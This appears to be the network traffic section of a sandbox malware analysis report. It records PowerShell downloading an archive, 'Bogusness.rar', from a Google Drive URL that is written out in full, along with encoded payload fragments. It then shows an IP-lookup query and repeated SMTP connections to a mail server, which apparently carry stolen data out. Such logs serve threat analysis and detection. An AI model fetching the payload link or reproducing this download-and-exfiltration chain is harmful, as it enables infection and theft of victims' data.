                                                                                  Apr 23, 2024 07:54:02.447870016 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.450084925 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.450134993 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.450330973 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.450377941 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.452300072 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.452353954 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.452362061 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.452404976 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.458719015 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.458765984 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.458781958 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.458826065 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.458832979 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.458878040 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.458884001 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.458914995 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.458930969 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.458976984 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.459002018 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.459045887 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.459053993 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.459096909 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.461221933 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.461265087 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.461275101 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.461311102 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.463289022 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.463339090 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.463347912 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.463395119 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.465430021 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.467473984 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.467525959 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.467533112 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.467978001 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.468677044 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.468723059 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.468781948 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.468847990 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.470693111 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.470740080 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.470746040 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.470786095 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.472672939 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.659394026 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.659471035 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.659487009 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.659518003 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.806998968 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.807058096 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.807096004 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.975280046 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.027517080 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.299622059 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.447508097 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.448683023 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.448700905 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.448770046 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.449167013 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.450089931 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.598283052 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.598380089 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.614702940 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.297290087 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.297785044 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.445868015 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.446373940 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.446629047 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.594088078 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.594435930 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.742103100 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.742131948 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.742872953 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.743185043 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.890408039 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.890434027 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.890486002 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.890963078 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.891191959 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.038656950 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.039805889 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.040160894 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.188082933 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.190781116 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.190989971 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.338622093 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.341419935 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.341722965 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.489399910 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.531970978 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.532202959 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.679991007 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.680208921 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.680705070 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680759907 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680788994 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680824041 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680857897 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680927992 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680958033 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680998087 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.681020021 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.681044102 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.828202963 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828232050 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828252077 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828306913 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828445911 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828504086 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:13.006736994 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:13.058762074 CEST49727587192.168.2.666.29.159.53
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 23, 2024 07:53:27.584307909 CEST | 50004 | 53 | 192.168.2.6 | 1.1.1.1
Apr 23, 2024 07:53:27.672594070 CEST | 53 | 50004 | 1.1.1.1 | 192.168.2.6
Apr 23, 2024 07:53:28.149734020 CEST | 61033 | 53 | 192.168.2.6 | 1.1.1.1
Apr 23, 2024 07:53:28.239141941 CEST | 53 | 61033 | 1.1.1.1 | 192.168.2.6
Apr 23, 2024 07:54:05.349443913 CEST | 57938 | 53 | 192.168.2.6 | 1.1.1.1
Apr 23, 2024 07:54:05.437577963 CEST | 53 | 57938 | 1.1.1.1 | 192.168.2.6
Apr 23, 2024 07:54:07.281855106 CEST | 55945 | 53 | 192.168.2.6 | 1.1.1.1
Apr 23, 2024 07:54:07.377547979 CEST | 53 | 55945 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 23, 2024 07:53:27.584307909 CEST | 192.168.2.6 | 1.1.1.1 | 0xef07 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:53:28.149734020 CEST | 192.168.2.6 | 1.1.1.1 | 0xc83f | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:05.349443913 CEST | 192.168.2.6 | 1.1.1.1 | 0xbd12 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:07.281855106 CEST | 192.168.2.6 | 1.1.1.1 | 0x5f3d | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 23, 2024 07:53:27.672594070 CEST | 1.1.1.1 | 192.168.2.6 | 0xef07 | No error (0) | drive.google.com | | 142.250.65.174 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:53:28.239141941 CEST | 1.1.1.1 | 192.168.2.6 | 0xc83f | No error (0) | drive.usercontent.google.com | | 142.251.35.161 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:05.437577963 CEST | 1.1.1.1 | 192.168.2.6 | 0xbd12 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:05.437577963 CEST | 1.1.1.1 | 192.168.2.6 | 0xbd12 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:05.437577963 CEST | 1.1.1.1 | 192.168.2.6 | 0xbd12 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:07.377547979 CEST | 1.1.1.1 | 192.168.2.6 | 0x5f3d | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001) | false
                                                                                  • drive.google.com
                                                                                  • drive.usercontent.google.com
                                                                                  • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49715 | 142.250.65.174 | 443 | 416 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-23 05:53:27 UTC | 215 | OUT | GET /uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: drive.google.com
                                                                                  Connection: Keep-Alive
2024-04-23 05:53:28 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:53:28 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: script-src 'nonce-bivVz2uxgaXJbfey8g8Paw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49716 | 142.251.35.161 | 443 | 416 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-23 05:53:28 UTC | 233 | OUT | GET /download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
2024-04-23 05:53:29 UTC | 4745 | IN | HTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: ABPtcPrJVU27lubB1I2WgNvatQpnA4ojeob_Zx2f4vWKhWs0QkaDJmRCUeI_a-ZnT8pS9v8VKfY
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="Bogusness.rar"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, 
X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 429220
                                                                                  Last-Modified: Mon, 22 Apr 2024 07:07:41 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:53:29 GMT
                                                                                  Expires: Tue, 23 Apr 2024 05:53:29 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=VycTRQ==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close
                                                                                  Data Ascii: yNdrmnmOPWzkEZFq/1NByvi5O8v8ERy2JAs5SwGANkrINTZKyDU2Sj3rRgqaoUhlcaM8zlYNt5MbqNnQaPTWZQjfm9dQvqtMT5krvuAbte5/tAJupTmcdJqPELA3mre4HW5JnUn3OxW3smHWQdI3XVUN9zPM0dGlFyVrQDEuzFpc2iKeJDJqZCF8Lecda2Rm99BUk9Et9OVb8mTI+Hj3PUzDac4Sb7dO7F25OrZdBGSjKmH1+24EbEnCOoySjbe
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 78 41 65 70 5a 2b 56 4c 4b 57 56 4a 6d 44 2b 70 51 6b 52 72 63 78 4b 43 69 56 53 2f 56 4b 55 6f 79 47 35 32 78 6f 53 4b 54 78 73 6e 53 4d 58 4b 73 42 39 56 39 37 4e 4c 6e 4b 4a 30 51 79 2b 51 52 37 5a 36 61 72 47 66 7a 49 6f 42 61 6c 6b 6e 45 52 79 7a 51 78 4c 65 37 76 63 47 58 6e 30 6e 45 56 64 32 47 33 37 65 6a 6a 30 32 74 57 45 45 4d 51 36 4b 56 49 44 6c 57 54 76 41 74 41 74 7a 6e 30 54 46 62 6c 79 6b 57 76 30 6c 32 5a 66 62 52 33 30 4b 74 70 35 56 38 2b 73 4b 65 72 31 39 73 33 71 6a 76 4d 54 59 61 63 49 4b 54 68 7a 6b 41 50 55 65 66 74 77 50 6f 61 63 6d 5a 66 7a 6e 53 6e 49 4c 39 32 74 6d 47 33 47 65 71 77 79 6f 30 4e 4e 66 78 39 55 6c 52 41 42 76 49 52 2b 31 52 48 46 39 6f 63 36 59 35 4a 55 4c 6c 2f 44 52 52 4e 4c 76 62 41 48 4e 79 37 6a 64 77 78 70
                                                                                  Data Ascii: xAepZ+VLKWVJmD+pQkRrcxKCiVS/VKUoyG52xoSKTxsnSMXKsB9V97NLnKJ0Qy+QR7Z6arGfzIoBalknERyzQxLe7vcGXn0nEVd2G37ejj02tWEEMQ6KVIDlWTvAtAtzn0TFblykWv0l2ZfbR30Ktp5V8+sKer19s3qjvMTYacIKThzkAPUeftwPoacmZfznSnIL92tmG3Geqwyo0NNfx9UlRABvIR+1RHF9oc6Y5JULl/DRRNLvbAHNy7jdwxp
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 4f 6c 53 74 6f 36 63 4f 74 68 44 6e 6c 33 4b 52 38 32 4a 59 53 37 64 50 2f 4c 6d 53 74 79 76 34 6a 30 75 33 50 4b 79 63 4c 75 6a 5a 68 59 57 39 32 6a 6a 44 51 32 53 67 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b
                                                                                  Data Ascii: OlSto6cOthDnl3KR82JYS7dP/LmStyv4j0u3PKycLujZhYW92jjDQ2SgAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAK
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 4d 41 31 76 52 2f 73 33 66 34 41 7a 44 56 6d 38 68 66 73 59 72 33 39 58 6b 37 4c 76 41 41 73 53 71 6e 51 4d 78 69 58 66 71 38 64 56 4c 7a 52 53 38 2b 6f 73 6f 4b 33 4f 30 6e 4e 30 41 79 61 75 33 79 68 56 46 6c 74 77 4e 74 4a 75 77 38 35 6d 2b 57 53 7a 70 63 37 47 47 65 6c 6a 44 4a 69 67 65 73 78 78 31 50 57 71 46 4c 79 32 52 41 77 30 76 53 77 66 4d 75 31 53 53 33 4d 79 44 55 35 78 66 5a 62 4e 6b 71 58 73 50 30 53 51 57 55 79 68 72 39 46 55 57 71 39 68 73 54 46 4a 53 50 2f 47 52 76 57 50 31 45 70 66 4f 52 41 45 4b 57 59 53 32 52 38 6e 38 38 4d 54 53 6d 38 51 33 67 71 47 6e 42 45 6a 79 41 56 4d 49 55 6e 31 32 55 62 4a 68 61 38 47 38 50 51 34 54 50 37 57 76 67 4d 41 79 52 55 6c 51 70 33 33 36 53 39 47 74 77 55 2b 61 57 69 42 33 74 75 71 71 53 63 74 6a 2f 5a
                                                                                  Data Ascii: MA1vR/s3f4AzDVm8hfsYr39Xk7LvAAsSqnQMxiXfq8dVLzRS8+osoK3O0nN0Ayau3yhVFltwNtJuw85m+WSzpc7GGeljDJigesxx1PWqFLy2RAw0vSwfMu1SS3MyDU5xfZbNkqXsP0SQWUyhr9FUWq9hsTFJSP/GRvWP1EpfORAEKWYS2R8n88MTSm8Q3gqGnBEjyAVMIUn12UbJha8G8PQ4TP7WvgMAyRUlQp336S9GtwU+aWiB3tuqqSctj/Z
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 79 5a 51 35 51 6b 4e 45 31 55 4e 32 73 42 49 6b 58 4b 68 39 30 68 46 37 42 58 47 32 74 73 36 2f 42 42 34 70 35 67 41 7a 32 48 61 69 45 69 42 49 50 46 4e 70 31 61 45 61 4c 35 6c 69 69 5a 6d 55 6c 76 48 4c 4a 34 79 38 57 75 75 30 77 54 33 6b 70 35 4c 44 33 7a 66 73 38 64 5a 71 79 4d 31 64 76 74 53 78 52 65 59 61 70 70 65 2b 75 79 58 4b 4e 54 59 5a 63 36 41 4c 33 48 79 30 33 57 4b 41 72 2b 44 4c 4f 39 32 31 31 50 57 30 33 53 37 76 55 4e 62 44 30 34 50 6a 45 6e 68 64 70 46 56 6b 4a 66 54 58 2b 74 61 52 4b 33 65 6b 74 51 70 2f 77 76 4e 39 37 73 41 59 6d 44 65 76 65 42 6d 54 33 62 6f 4a 7a 44 56 67 39 43 36 48 75 64 39 4a 32 2b 50 30 6c 34 53 33 76 47 66 37 53 65 78 4a 77 35 33 41 6d 48 65 2f 64 49 6f 62 64 78 46 35 30 64 37 66 4a 77 6e 76 77 53 76 67 2f 55 6a
                                                                                  Data Ascii: yZQ5QkNE1UN2sBIkXKh90hF7BXG2ts6/BB4p5gAz2HaiEiBIPFNp1aEaL5liiZmUlvHLJ4y8Wuu0wT3kp5LD3zfs8dZqyM1dvtSxReYappe+uyXKNTYZc6AL3Hy03WKAr+DLO9211PW03S7vUNbD04PjEnhdpFVkJfTX+taRK3ektQp/wvN97sAYmDeveBmT3boJzDVg9C6Hud9J2+P0l4S3vGf7SexJw53AmHe/dIobdxF50d7fJwnvwSvg/Uj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49723 | 142.250.65.174 | 443 | 5808 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
